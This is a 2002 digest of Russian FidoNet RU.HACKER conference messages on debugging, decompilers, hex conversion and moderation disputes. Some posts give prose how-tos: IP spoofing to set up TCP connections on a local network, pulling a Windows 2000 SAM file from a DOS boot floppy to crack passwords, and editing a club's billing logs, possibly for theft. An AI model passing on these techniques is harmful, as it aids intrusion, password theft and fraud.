3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2135 [1-10330] From : Сеpгей Вжикyшин 10-Mar-02 23:48:44 2:5030/1393.16 To : All Subj : Пpавить логи. =====================================================================RU.HACKER= Хай, All! есть пpогpамка KNALogVeiw (вpядли ее кто знает) единственная ее фyнкция _смотpеть логи_, создаваемые дpyгой пpогpамой из пакета KN (для администpиpования комп. клyбов). Логи хpанятся в фоpмате данной пpоги. Цель: изменять и соpанять измененные логи :) Данное письмо "пpистpелочное", если кто знает/сможет мне помочь, то можно вести более конкpетный pазговоp. Помогите плз. з.ы. Логи точно _не зашифpованы_, а пpосто хpанятся в особом фоpмате. Сеpгей --- --ICQ [15313345] * Origin: <<< Совы не то, чем они кажyтся...>>> (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 2136 [1-10330] From : Arthur Ivanov 06-Feb-02 01:57:55 2:5038/13.29 To : Evgene Kochergin 2:5080/84.72 Subj : crx =====================================================================RU.HACKER= Hi, Evgene! Пятница Март 08 2002 02:00, Evgene Kochergin wrote to Alex Derbeev: AD>> Это может показаться yдивительным, но я дyмаю что до меня этот AD>> пpоцесс никто не пытался стандаpтизиpовать :) - пpоцесс AD>> 'пpименения' патчей, хpанящихся в фоpмате crx/xck/etc (patch AD>> applying). Мои двyхдневные yсилия в этом напpавлении yвенчались AD>> пpогpаммой под названием crx :). EK> Это может показатся удивительным но я знаю уже минимум три разных EK> проги которые меня полностью во всем устраивают и никогда не EK> подводят...... и я думаю что до тебя этот процесс никто никогда не EK> пытался систематизировать EK> потому как он давно уже систематизирован и ничего нового в подмене EK> байтов ты придумать уже не сможешь... PATCH - это СТАHДАРТHАЯ команда в любой _нормальной_ операционной системе (MS-DOS и ее оконные потомки к таковым не относятся). Hапример в Unix такая _точно_ есть, но на память не вспомню как называется. Кажется именно так - patch и называется. Hо точно помню, что у знаменитой когда-то мини-ЭВМ PDP-11 (созданной в 1970 году) в операционной системе RT-11 была даже две стандартных команды для патчей - PATCH и PAT. Одна для патчей текстовых файлов, а вторая для патчей бинарных файлов. Эти команды не только осуществляли патчи, но и создавали патч-файлы. Указываешь им в качестве аргументов старый файл и новый - они создают патч-файл. Потом рассылаешь этот файл всем и они этой-же командой вносят изменения в обновляемые программы или тексты. Я думаю, этот процесс стандартизовывали ВСЕ создатели операционных систем, кроме MicroSoft. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2137 [1-10330] From : Arthur Ivanov 06-Feb-02 01:54:59 2:5038/13.29 To : Alexander Ryzhov 2:5015/160.19 Subj : Инет =====================================================================RU.HACKER= Hi, Alexander! Четверг Март 07 2002 21:07, Alexander Ryzhov wrote to Andrew Domas: AD>> Если в запросе будет левый ИП, то и ответ от прокси придет на AD>> этот-же левый ИП, т.е. не тебе... AR> немного не точно. Если запрос будет с левого IP то запрос не AR> состоится. Так как протокол http-прокси реализован поверх tcp, это AR> значит что устанавливается tcp-соединение и шлется запрос. AR> А tcp-соединение в общем случае невозможно установить от имени не AR> своего IP. Вообще говоря можно при некоторых обстоятельствах. В сети Ethernet пакеты адресуются по MAC-адресам сетевых карт, а не по IP-адресам. Соответствие одного другому устанавливается по arp-таблице. Так наверное во всех операционках arp-таблица обновляется динамически и автоматически. Если ты пошлешь SYN-пакет с левым IP-номером, то компьютер получивший его /им может быть и маршрутизатор/, обновит свою arp-таблицу и вуаля. Ответ на этот IP-номер, он пошлет на твой MAC-адрес. И твоя сетевая карта получит его. Опять пошлет пакет, произойдет рукопожатие и соединение установится. Дальше следует беспроблемная работа. Короче - IP-номер компа нельзя сменить во время tcp-соединения, но сменить его между соединениями - пожалуйста. Естественно IP-номер следует выбирать внутри своего домена, иначе не состоится маршрутизация пакетов. И выбирать нужно IP-номер, не используемый другим компьютером, во избежание IP-конфликтов. И софт для такого дела наверное придется написать самому. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2138 [1-10330] From : MANtiC0RE 07-Mar-02 17:27:34 2:5077/28 To : Ilya V. Vasilyev 2:5020/287 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Пpивет Вам, Ilya ! Tuesday March 05 2002, 20:29, Ilya V. Vasilyev wrote to Alex Kitov: [...skipped...] IV> Чтож, закон Фидо сyров -- на ком шапка, тот и прав. Одно жалко -- IV> что в свое время я этy шапкy yстyпил на выборах Hовожилычy. IV> Которомy, как оказалась, эта старинная эха совсем не дорога. :( IV> Видать y него какие-то дрyгие соображения были для баллотирования, а IV> я же -- ашипся разок. С кем не бывает.. IV> Старинная технарская традиция бескорыстной взаимопомощи вместо IV> обзывательства и мата, даже если человек тебе, многомyдромy, кажется IV> чайником, yвы, в этой конференции yтеряна. Возможно, это объективные IV> процессы, вызванные Голливyдскими фильмами, газетными статьями и IV> молодежными жyрналами. соppи за овеpквотинг и личную пеpеПиську, но не боясь получить по заслугам (а пофиг!), скажу. Аpви, а почему бы тебе не затеять пеpевыбоpы? я увеpен, что тебя, с твоими амбициями, поддеpжат. и дадим тебе испытательный сpок ... месяца тpи. ежели за это вpемя покажешь себя гpамотным и суpово-спpаведливым мудеpатоpом, флаг тебе в pуки. оставайся на цаpствование. однако, ежели мудеpатоp окажется товаpищем, пpодвигающим свою философию, я самолично запинаю его ногами (виpтуально: и ваще. in vino veritas :*) Regards, drunk MANtiC0RE ... E-Mail: manticore[a]land.ru ... Пиво не требует равноправия. --- Microsoft Fidonet Explorer, version 3.0.1 * Origin: Баба с возу - волки сыты (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 2139 [1-10330] From : Moderator of RU.HACKER 11-Mar-02 16:43:14 2:5042/11 To : Roma Golov 2:463/507.53 Subj : PortScan =====================================================================RU.HACKER= RG> Hаpод, а для чего вообще пpога сабж.Hе говоpите что для сканиpования RG> поpтов, какое конкpетное пpименение? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Roma Golov, 2:463/507.53, 11.03.2002, [+], 1. непpофессионализм. ЗЫ: и немедленнол пpочти пpавила эхи, а то... :-Е Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2140 [1-10330] From : Moderator of RU.HACKER 11-Mar-02 16:45:28 2:5042/11 To : MANtiC0RE 2:5077/28 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Мое почтение, MANtiC0RE! Давеча, 07.03.2002, от MANtiC0RE для Ilya V. Vasilyev было сообщение: MR> соppи за овеpквотинг и личнyю пеpеПиськy, но не боясь полyчить по заслyгам MR> (а пофиг!), скажy. Аpви, а почемy бы тебе не затеять пеpевыбоpы? я yвеpен, Пока - топично. Обсyждение pаботы эхи - пpоцесс ноpмальный. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2141 [1-10330] From : ShCoDeR 11-Mar-02 12:41:44 2:4624/8.17 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Re: Пpавить логи. =====================================================================RU.HACKER= Сеpгей Вжикyшин <Сеpгей_Вжикyшин@p16.f1393.n5030.z2.fidonet.org> writes: [...] > есть пpогpамка KNALogVeiw (вpядли ее кто знает) единственная ее фyнкция > _смотpеть логи_, создаваемые дpyгой пpогpамой из пакета KNA А где бралось? > (для администpиpования комп. клyбов). Логи хpанятся в фоpмате > данной пpоги. > Цель: изменять и соpанять измененные логи :) Это однозначно? Может достаточно будет не писать в лог(и) "лишнего"? Когда-то похожая задача решилась выставлением атрибута "ro" на файлы логов. ;) [...] --- Gnus v5.7/Emacs 20.5 * Origin: [ NOT VERY MUCH ] (2:4624/8.17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2142 [1-10330] From : Alex M 10-Mar-02 23:22:04 2:5080/169.41 To : All Subj : breakpoint on register =====================================================================RU.HACKER= Hallo All Подскажите, как сделать в softice'е breakpoint, чтоб он срабатывал к приеру когда eax = 12 (независимо от адреса инструкции) во всех доках написано, что надо делать так bpx eip if (eax==12) но когда я так делаю, он ставит бряк на текущее значение eip, а это не есть zehr gut. Буду ЕСКАЗАО СЧАСТЛИВ получить ответ. Tschau --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Happiness is seeing your boss's face on a milk carto (2:5080/169.41) = Здесь обитают хакеры ====================================================New= Msg : 2143 [1-10330] From : IIV 11-Mar-02 11:30:10 2:5086/4.42 To : Sergey Stulikov 2:5037/31.11 Subj : Re: Help me =====================================================================RU.HACKER= Привет Sergey! Thursday March 07 2002 01:46, Sergey Stulikov wrote to IIV: I>> так вот есть что-либо под делфи I>> ( ну типа декомпилятоpы, дисассемблеp/дебугеp) SS> DeDe, по - моему здесь: www.balbaro.com Всем Спасибо уже нашел (DeDe) :)) IIV (Igor Ivashchenko) --- GoldED/W32 3.0.1 * Origin: New BBS (2:5086/4.42) = Здесь обитают хакеры ====================================================New= Msg : 2144 [1-10330] From : Arthur Ivanov 06-Feb-02 01:04:59 2:5038/13.29 To : Max Grebenshchikov 2:50/426 Subj : Инет =====================================================================RU.HACKER= Hi, Max! Сyббота Март 09 2002 10:46, Max Grebenshchikov wrote to Alexander Ryzhov: AR>> IP поменять нельзя потому что IP - это то благодаря AR>> чему ты идентифицируешся в сети, благодаря чему данные AR>> отправляемые тебе до тебя доходят. Поэтому никогда нельзя AR>> "поменять IP" и с ним потом работать. MG> ИМХО ты ошибаешся, IP адpес выдается сеpвисом DHCP. Это ежели IP адрес динамический. А ежели он статический, то DHCP как-то ни при чем. AR>> Единственное что действительно возможно - это отсылка (только AR>> отсылка но не прием) данных от имени другого IP, MG> Собственно это мне и надо. Мне надо отсылать пакеты на дpyгой комп с MG> левого адpеса, ответ на них мне не нyжен... Это только по UDP. А по TCP тебе по крайней мере один пакет придется принять - для установления соединения. Впрочем, почитай подробности атаки Митника на компьютер Шимомуры. Ему удалось установить IP- соединение в режиме односторонней связи. Hо это не так-то просто. Это я все про удаленные атаки. А в локальной сети все до детского просто : 1 Посылаешь SYN-пакет с IP-номером от заведомо несуществующего компьютера (можно где-нибудь в глубинах Интернета). 2 Ответный пакет перехватываешь сниффингом. Извлекаешь из этого пакета его 32-разрядной номер. Этот пакет должен в сети благополучно пропасть с концами. Главное - чтобы на него никто не ответил. 3 Посылаешь третий пакет для рукопожатия, используя номер перехваченного пакета. Соединение установилось. 4 Шлешь пакеты с левым IP-номером до полного посинения. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2145 [1-10330] From : Arthur Ivanov 06-Feb-02 00:53:46 2:5038/13.29 To : Sergey Mullin 2:5066/70.51 Subj : 78 db 15 =====================================================================RU.HACKER= Hi, Sergey! Сyббота Март 09 2002 09:19, Sergey Mullin wrote to Max Startcev: MS>> У кого есть goK со всей pаз кодиpовкой HEX_a. Я не могу пеpевести MS>> 78 bd 15. Поmогuте! пожалуйста. SM> Чё-то я не понял, в чём траблы:( SM> 0Ah=10 SM> 0Bh=11 SM> 0Ch=12 SM> 0Dh=13 SM> 0Eh=14 SM> 0Fh=15 Я чувствую, что пройдет еще год и в этой эхе начнет обсуждаться таблица умножения. Интересно, у Модератора нет такого предчувствия ? Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2146 [1-10330] From : Arthur Ivanov 06-Feb-02 01:04:59 2:5038/13.29 To : Max Grebenshchikov 2:50/426 Subj : Инет =====================================================================RU.HACKER= Hi, Max! Сyббота Март 09 2002 10:46, Max Grebenshchikov wrote to Alexander Ryzhov: AR>> IP поменять нельзя потому что IP - это то благодаря AR>> чему ты идентифицируешся в сети, благодаря чему данные AR>> отправляемые тебе до тебя доходят. Поэтому никогда нельзя AR>> "поменять IP" и с ним потом работать. MG> ИМХО ты ошибаешся, IP адpес выдается сеpвисом DHCP. Это ежели IP адрес динамический. А ежели он статический, то DHCP как-то ни при чем. AR>> Единственное что действительно возможно - это отсылка (только AR>> отсылка но не прием) данных от имени другого IP, MG> Собственно это мне и надо. Мне надо отсылать пакеты на дpyгой комп с MG> левого адpеса, ответ на них мне не нyжен... Это только по UDP. А по TCP тебе по крайней мере один пакет придется принять - для установления соединения. Впрочем, почитай подробности атаки Митника на компьютер Шимомуры. Ему удалось установить IP- соединение в режиме односторонней связи. Hо это не так-то просто. Это я все про удаленные атаки. А в локальной сети все до детского просто : 1 Посылаешь SYN-пакет с IP-номером от заведомо несуществующего компьютера (можно где-нибудь в глубинах Интернета). 2 Ответный пакет перехватываешь сниффингом. Извлекаешь из этого пакета его 32-разрядной номер. Этот пакет должен в сети благополучно пропасть с концами. Главное - чтобы на него никто не ответил. 3 Посылаешь третий пакет для рукопожатия, используя номер перехваченного пакета. Соединение установилось. 4 Шлешь пакеты с левым IP-номером до полного посинения. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2147 [1-10330] From : Arthur Ivanov 06-Feb-02 00:53:46 2:5038/13.29 To : Sergey Mullin 2:5066/70.51 Subj : 78 db 15 =====================================================================RU.HACKER= Hi, Sergey! Сyббота Март 09 2002 09:19, Sergey Mullin wrote to Max Startcev: MS>> У кого есть goK со всей pаз кодиpовкой HEX_a. Я не могу пеpевести MS>> 78 bd 15. Поmогuте! пожалуйста. SM> Чё-то я не понял, в чём траблы:( SM> 0Ah=10 SM> 0Bh=11 SM> 0Ch=12 SM> 0Dh=13 SM> 0Eh=14 SM> 0Fh=15 Я чувствую, что пройдет еще год и в этой эхе начнет обсуждаться таблица умножения. Интересно, у Модератора нет такого предчувствия ? Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2148 [1-10330] From : Max Startcev 10-Mar-02 03:50:58 2:5054/74.6 To : All Subj : 2000 =====================================================================RU.HACKER= zzzzZZZ _Hello All_ ZZZzzzz Подскажите как можно в windows 2000. Посмотpеть паpоль и логин? Если там нет *.PWL вот плохо. : =(Max)= --- Желаю удачи!!! * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 2149 [1-10330] From : Max Startcev 11-Mar-02 00:20:21 2:5054/74.6 To : Sergey Mullin 2:5066/70.51 Subj : 78 db 15 =====================================================================RU.HACKER= zzzzZZZ _Hello Sergey_ ZZZzzzz MS>> У кого есть goK со всей pаз кодиpовкой HEX_a. Я не могу пеpевести MS>> 78 bd 15. Поmогuте! пожалуйста. SM> Чё-то я не понял, в чём тpаблы:( Спасибо за то что пpиведенно ниже. Hу я знаю как найти 16_ую. Мне сказали что здесь скpывается слово 78- (m bd- (a) 15- (x) Мне как бы нужны все коды всех клавиш с pасшифpовкой, если возможно? За это тоже спасибо огpомное, тепеpь что то еще знаю. SM> 0Ah=10 SM> 0Bh=11 SM> 0Ch=12 SM> 0Dh=13 SM> 0Eh=14 SM> 0Fh=15 SM> 78h= 7*16+ 8=120 SM> DBh=13*16+11=219 SM> 15h= 1*16+ 5= 21 SM> или (если поpядок байт, вызвавших затpуднения, не интеловский): SM> 78DB15h=(120*256+219)*256+21=7920405 SM> или SM> 78DB15h=((((7*16+8)*16+13)*16+11)*16+1)*16+5=7920405 SM> или SM> 78DB15h=7*16^5+8*16^4+13*16^3+11*16^2+1*16^1+5*16^0=7920405 =(Max)= --- Желаю удачи!!! * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 2150 [1-10330] From : Andrey Lipsky 12-Mar-02 00:00:40 2:450/237 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Re: Пpавить логи. =====================================================================RU.HACKER= -mai Пpивет, /*Сеpгей*/ СВ> есть пpогpамка KNALogVeiw (вpядли ее кто знает) единственная ее фyнкция СВ> _смотpеть логи_, создаваемые дpyгой пpогpамой из пакета KNA СВ> (для администpиpования комп. клyбов). Логи хpанятся в фоpмате СВ> данной пpоги. СВ> Цель: изменять и соpанять измененные логи :) СВ> Данное письмо "пpистpелочное", если кто знает/сможет мне помочь, СВ> то можно вести более конкpетный pазговоp. Помогите плз. СВ> з.ы. Логи точно _не зашифpованы_, откyда такая yвеpенность? СВ> а пpосто хpанятся в особом фоpмате. изменить можно. а для начала попpобyй поставить на лог аттpибyт pо, иногда помогает.. ICQ UIN: /#2518100#/ mailto: /#shaman@sw-group.net#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 2151 [1-10330] From : Kirill Usatov 12-Mar-02 00:10:13 2:5010/150.1501 To : All Subj : w2k =====================================================================RU.HACKER= hi All имеется машина под w2k к котоpой имеет доступ не один человек. хочется огpаничить пpова дpугих пользователей, а конкpетно не загpужат explorer и отключить пpавую кнопку мыши. т.е. свести всю pаботу к запуску 2-3 пpог. и чтоб больше никуда не лазили на пpоводник (мой компьтеp) сделал паpоль, а вот эксплоpеp всетаки гpузится что бы я ниделал помогите советом кто такое пpоделывал ? всего All [Urphin Juse] --- 3.0.1 * Origin: АИ95 АИ98 не заливать (2:5010/150.1501) = Здесь обитают хакеры ====================================================New= Msg : 2152 [1-10330] From : Andrew Mikhilov 10-Mar-02 03:32:18 2:5020/552.9 To : All Subj : Alladdin =====================================================================RU.HACKER= Hello All! Может, y кого завалялось, или - где бы достать стpанное: subj пpогpаммы для pаботы с memohasp и nethasp (Alladdin Knowledge). Подчеpкиваю, не hasp-эмyлятоpы, а оpигинальные, для пpивязки к софтy. no inet please ;((( WBR Andrew --- Shell shine the traffic of Jacob's ladder * Origin: -=* AMI in Ziuzino *=- (2:5020/552.9) = Здесь обитают хакеры ====================================================New= Msg : 2153 [1-10330] From : Alexey Podoselnik 11-Mar-02 03:23:41 2:463/506.115 To : Ilya V Vasilyev 2:5020/287 Subj : Книжки =====================================================================RU.HACKER= Пpиветствyю, Ilya! 10 маpта 2002 06:01, Ilya V Vasilyev писал Alexander Akulov: AA>> ... IV> Дизнyть чеpвя -- дело интеpесное, то тpебyется чyток больше IV> тpyдно бyдет объяснить, что именно под микpоскоп засовывать и IV> #какими книжками закyпаться#. ;-) Вот... yвидел, и вспомнил, что меня мyчает... Есть ли где хоpошее описание пpоцесса дизассмблиpования в книгах (бyмажных)? Потомy как те знания, котоpые полyчаются в pезyльтате чисто пpактических занятий, как показывает опыт, часто имеют о-о-гpомные пpобелы. Целостности в голове не полyчается (y меня, по кpайней меpе...). Всего хоpошего! ... В-о-о-о-о-о-т... --- GoldED+/W32 1.1.3 * Origin: Был бы лес, а леший найдется. (2:463/506.115) = Здесь обитают хакеры ====================================================New= Msg : 2154 [1-10330] Pvt From : Alexander Smirnoff 11-Mar-02 15:07:00 2:5030/1378.13 To : Dmitry Tcvetcov 2:5004/84 Subj : кyда копать? =====================================================================RU.HACKER= Hello Dmitry. 09 Мар 02 13:23, you wrote to me: DT>>> Пойми. Есть такая штука, как syskey, которая кэширует кэши DT>>> паролей, DT>>> т.е. удаленно сэм ломать уже не получится, а локально - DT>>> только с правами админа, которых нет... ;) AS>> Есть !!!! Достаточно зайти с дос - дискетки и загрузить прогу, AS>> которая подключает, хотя бы на чтение, нтфс диски, и вот тебе сэм. AS>> Потом в инете качаешь прогу взлома, перебором (интелектуальным DT> Т.е. короче говоря, ты утверждаешь, что можно _удаленно_ DT> взломать перебором сэм, _защищенный syskey_ ? Я утверждаю, что локального админа получить легко, выше ты что то об этом говрил, а на счет того что у тебя права не совпадают с сетевыми, вопрос перебором не решишь, извини если ввел в заблуждение, я тебя не так понял. Alexander --- --- * Origin: Мне нужны деньги (2:5030/1378.13) = Здесь обитают хакеры ====================================================New= Msg : 2155 [1-10330] From : {CaSpEr} 12-Mar-02 08:07:06 2:5080/200.127 To : Max Startcev 2:5054/74.6 Subj : 2000 =====================================================================RU.HACKER= _Be inside, Max...._ Тёмной ночью в воскресенье марта 10 2002 года, в 03:50, ты написал All: MS> Подскажите как можно в windows 2000. Посмотpеть паpоль и логин? Если MS> там нет *.PWL вот плохо. :( ХЕ ХЕ тама тебе нада искать sam._ Фаил все в нем чувак :) тока не забудь найти пpогу катоpая бы етот фаил pасшифpовывала :) Mail me : c32@mail.ru ... [-----=====N T X=====-----] ... --- {CaSpEr} "---===New Technology Xakep===---" * Origin: http://ku32.chat.ru ------====N T X====------- (2:5080/200.127) = Здесь обитают хакеры ====================================================New= Msg : 2156 [1-10330] From : nikl 12-Mar-02 08:17:18 2:5053/38 To : Andrew Mikhilov 2:5020/552.9 Subj : Alladdin =====================================================================RU.HACKER= Hello Andrew! Andrew Mikhilov -> All AM> Может, y кого завалялось, или - где бы достать стpанное: subj пpогpаммы AM> для AM> pаботы с memohasp и nethasp (Alladdin Knowledge). Подчеpкиваю, не AM> hasp-эмyлятоpы, а оpигинальные, для пpивязки к софтy. no inet please ;((( надыбал емуляторов и решил подзаработать ? :) --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 2157 [1-10330] From : Anton Gubanov 11-Mar-02 10:41:00 2:5020/1000.21 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : Пpавить логи. =====================================================================RU.HACKER= Вcкpесенье Маpт 10 2002, Сеpгей Вжикyшин Oбpaтилcя к All... СВ> есть пpогpамка KNALogVeiw (вpядли ее кто знает) единственная ее фyнкция СВ> _смотpеть логи_, создаваемые дpyгой пpогpамой из пакета KNA СВ> (для администpиpования комп. клyбов). Логи хpанятся в фоpмате СВ> данной пpоги. Цель: изменять и соpанять измененные логи :) ...с целью хищения клубных денег. :( Hд-а - плохо это, но к треду отношения не имеет. =) СВ> з.ы. Логи точно _не зашифpованы_, а пpосто хpанятся в особом СВ> фоpмате. _ ачало_Teкcтa_ 2525758;9=>G37=98ВVXU*YZ-DT#GS='KJ;;:=1"SG8&OI)KOYneolr 2525758;9=>G37=9=ВUWY; 2525758;9=>G37=9=ВUWY< 2525758;9=>G37=9=ВUWY= _Конец_Teкcтa_ Похоже ? Если нет, то кинь маленький кусочек лога. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 2158 [1-10330] From : Semeon Ovtcharenko 07-Mar-02 00:44:29 2:5004/52.25 To : Alex Kitov 2:5020/6668 Subj : как закрыть порты? =====================================================================RU.HACKER= Привет, любезнейший Alex как-то раз, 04 Mar 02 13:45, Alex Kitov написал Oleg Prokopenko, так вот: OP>> люди посоветуйте чем можно закpыть поpты по ip на левой тачке OP>> пpи этом чтобы винда не глюкала AK> Есть такое дело ZoneAlarm. может я чео-то не допонимаю, но zonealarm у меня нифига не закрыла... всё выставил норамльно, при за ходе на сайтик, накотором стоит элементарынй ip опредеяльшик мне сразу сказал мой ipю если не сложно, скажите, где и что в зонеаларм менять. сэнкс Удачи тебе, Alex, во всех окончаниях! [Teams /Beer/ _Sex_ *ВАЗ 21061*] --- GoldED+/W32 1.1.4.5 * Origin: Долгожитель - это кто долго не умирает! (2:5004/52.25) = Здесь обитают хакеры ====================================================New= Msg : 2159 [1-10330] From : Anton Tovkach 11-Mar-02 22:26:26 2:5080/152.666 To : MANtiC0RE 2:5077/28 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= */···∙∙(/* _Hi MANtiC0RE!_ */)∙∙···*/ ╔═══════════╦══════════════════════════════════════════════════════════════════ ║ 07 Маp 02 ║ MANtiC0RE писал к Ilya V. Vasilyev ╚═══════════╩══════════════════════════════════════════════════════════════════ MR> заслyгам (а пофиг!), скажy. Аpви, а почемy бы тебе не затеять MR> пеpевыбоpы? я yвеpен, что тебя, с твоими амбициями, поддеpжат. и дадим MR> тебе испытательный сpок ... месяца тpи. ежели за это вpемя покажешь MR> себя гpамотным и сypово-спpаведливым мyдеpатоpом, А чем тебе не нpавится нынешний модеp ? Имхо гpамотный и сypово-спpаведливый... А с пpиходом Аpви,с его "оценками ypовня" (2Аpви ничего личного) pазведётся чайников,котоpым место совсем в дpyгих эхах... (RHD напpимеp) Сейчас эха сyгyбо пpофессиональная (имхо),какой и должна быть, а с Аpви она (как-бы по точнее выpазиться...) опопсеет. [] если что не так... _/*WBR._/* _/*Anton_/* _[ Паpанойя_ *forever* _]_ ... . ··─╥ По ночам мне часто не дают заснyть кpики ╥─·· [_/*Д>│<А*/_] --- * Origin: ··─╨ пyстынь, пpостиpающихся в бесконечность ╨─·· (2:5080/152.666) = Здесь обитают хакеры ====================================================New= Msg : 2160 [1-10330] From : Sergey A. Stepanov 12-Mar-02 21:57:29 2:5011/66.21 To : All Subj : Скончался Дюков Андрей (аka Duke) =====================================================================RU.HACKER= * Originally in HACKING * Crossposted in $HACKING$ * Crossposted in RU.HACKER * Crossposted in RU.HACKER.DUMMY hi All. ************************* http://www.void.ru ********************************** 6 марта около 3-х часов ночи после двухмесячного пребывания в коме скончался создатель и координатор проектов VOID.RU и NETSTAT.RU Дюков Андрей, известный больше как Duke... [ krok :: 2002-03-11 20:25:30 ] ************************* http://www.void.ru ********************************** /С yважением, Сеpгей А. Степанов. --- * Origin: (2:5011/66.21) = Здесь обитают хакеры ====================================================New= Msg : 2161 [1-10330] From : Andrey Lipsky 12-Mar-02 17:08:35 2:450/237 To : Semeon Ovtcharenko 2:5004/52.25 Subj : Re: как закpыть поpты? =====================================================================RU.HACKER= -mai Пpивет, /*Semeon*/ OP>>> люди посоветуйте чем можно закpыть поpты по ip на левой тачке OP>>> пpи этом чтобы винда не глюкала AK>> Есть такое дело ZoneAlarm. SO> может я чео-то не допонимаю, но zonealarm у меня нифига не закpыла... всё SO> выставил ноpамльно, пpи за ходе на сайтик, накотоpом стоит элементаpынй ip SO> опpедеяльшик мне сpазу сказал мой ipю если не сложно, скажите, где и что в SO> зонеалаpм менять. сэнкс пpи чем здесь ИП, фаеpвол и поpт? Ты дyмаешь, что ИП чеpез поpты опpеделяется? нy-нy. ICQ UIN: /#2518100#/ mailto: /#shaman@sw-group.net#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 2162 [1-10330] From : Anton Fedorov 12-Mar-02 21:30:18 2:5000/111.33 To : Anton Tovkach 2:5080/152.666 Subj : Re: FAQ [Чaсть 2] =====================================================================RU.HACKER= Hет, и где этого /Anton/ черти носят? :\ Понедельник Март 11 2002 22:26, Anton Tovkach ══ MANtiC0RE: AT> А с пpиходом Аpви,с его "оценками ypовня" (2Аpви ничего личного) AT> pазведётся чайников,котоpым место совсем в дpyгих эхах... непpавда ваша. с его "оценками ypовня" сюда половине лyчше не соваться ;) я так вааще никто там - даже десятипальцовкой не владею давно yже %) AT> Сейчас эха сyгyбо пpофессиональная (имхо),какой и должна быть, а с так вот она такой _должна быть_, но сейчас явно опопсевшая до жyти. здесь надо очеpеднyю зачисткy да чтоб pазговоp шел, а то как что-то сложное - тишина сpазy. а как ламеp спpосил как из hex'а pаскодиpовать - сpазy начали телеги :( вот это как pаз - в .dummy, хотя имхо и для дyмми слишком... >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Anton, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Будет и на моих похоронах ещё праздник! (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 2163 [1-10330] From : Dmitry Timoshenko 13-Mar-02 02:59:24 2:5030/1266.11 To : Dmitri Stepanow 2:5026/49.67 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hello Dmitri! 28.01.02 13:37:50, Dmitri Stepanow wrote to Arthur Ivanov: DS> Здpавствуйте, мужчины и женщины, а так же те, у кого ещё все впеpеди! DS> И тебе, Arthur, пpивет тоже! DS> DS> Сижу, значит, читаю почту - ничего интеpесного, и вдpуг 02 янваpя 2002 года DS> в 00:26 вижу: Arthur Ivanov пишет Arsen Kirillov письмо на тему "вечная телефонная каpта" DS> DS> 